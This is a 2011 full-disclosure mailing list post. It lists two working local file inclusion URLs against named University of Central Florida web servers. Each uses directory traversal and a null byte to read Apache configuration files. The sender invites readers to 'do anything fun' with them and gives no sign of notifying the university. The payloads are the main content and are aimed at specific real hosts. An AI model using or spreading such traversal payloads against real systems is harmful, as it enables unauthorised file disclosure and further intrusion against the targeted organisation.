
Date: Sat, 19 Feb 2011 01:08:56 -0500
From: Hack Talk <hacktalkblog@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: University of Central Florida Multiple LFI

Found these and thought I'd share:

-==================-
http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
-==================-
Let me know if you do anything fun with 'em

Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
